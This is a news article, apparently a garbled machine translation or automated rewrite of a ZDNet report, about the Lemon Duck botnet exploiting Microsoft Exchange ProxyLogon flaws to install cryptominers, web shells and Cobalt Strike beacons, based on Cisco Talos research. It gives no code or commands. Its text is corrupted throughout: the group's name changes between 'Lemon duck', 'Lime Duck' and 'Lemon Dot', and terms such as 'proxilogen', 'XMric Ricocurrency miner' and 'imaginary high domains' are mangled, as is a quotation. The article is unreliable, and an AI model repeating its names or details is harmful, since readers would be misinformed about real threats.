Lemon ducks attack Microsoft Exchange servers

Researchers have examined the latest activities of the Lime Duck cybercriminal group, including their exploitation of Microsoft Exchange server vulnerabilities and the use of fake top-level domains.

The exploitation of Microsoft Exchange server vulnerabilities by cybercriminals is a disaster for the security of thousands of organizations.

Four major vulnerabilities known as proxilogen affected Microsoft Exchange 2013, 2016 and 2010 on-premises servers. Patches, vulnerability detection tools and mitigation guidelines were available in March, but it is still estimated that up to 60,000 companies may have compromised. Exploitation code is also now available, and at least 10 sophisticated cybercriminal groups have accepted loopholes in their attacks this year.

Lemon duck botnet under the microscope

At the end of March, Microsoft warned that Botnet was trying to exploit vulnerable servers and use compromised systems in mining cryptocurrency. Today, there are Cisco Talos researchers An in-depth analysis was published Tactics of this group.

Lime Duck operators are integrating new tools to “increase the effectiveness of their campaigns” by targeting vulnerabilities in the Microsoft Exchange server. Telemetry data from DNS queries to Lemon Duck’s domains indicate that campaign activity peaked in April. Most of the demands came from the United States, followed by Europe and Southeast Asia. There was a significant increase in demand for a lemon duck field in India.

Lime Duck operators use automated tools to analyze, detect, and exploit servers before installing payloads such as cobalt strike DNS tags and web shells that allow mining software to run. Additional cryptocurrency and malware.

Antivirus

Malware and related PowerShell scripts attempt to remove antivirus products provided by vendors such as ESET and Kaspersky, and to close any service, including Windows Update and Windows Defender – which could hinder infection.

Planned missions are being developed to maintain stability, and in recent campaigns, the command line program in Chert has been used to download two new PowerShell scripts that are responsible for removing anti-virus products, creating follow-up procedures, and downloading XMric Ricocurrency miner variants.

The signatures of competing cryptocurrency miners are also listed in the “killer” module aimed at removing them.

SMBGhost and Eternal Blue have been used in past campaigns, but as the Microsoft Exchange server exploits vulnerabilities, the team’s tactics continue to advance beyond the game.

Fictional domains

In an attempt to cover up the infrastructure of command and control (C2) centers, the lemon duck also created imaginary high domains (TLDs) for China, Japan and South Korea.

“Considering that these CCDLDs are often used for websites in their respective countries and languages, they were used in connection with this attack, rather than the more common and universally used DLDs such as” .com “or” .net ” Is interesting. “,” Cisco Talos notes. “This will allow the malicious actor to more effectively hide communications for the control server on other web traffic in the victim’s environment. “

Links are found between Lemon Duck Botnet and Pip / Pastil cryptocurrency malware.

“The use of new tools such as the Cobalt Strike and the implementation of additional ambiguous techniques throughout the attack life cycle will allow them to function more effectively in the attack for a longer period of time.” “With new tactics and additional host-based evidence, this player is now showing a particular interest in Exchange servers as he seeks to compromise additional settings and maintain and / or increase the number of systems in Lemon Dot Botnet.”

Source: ZDNet.com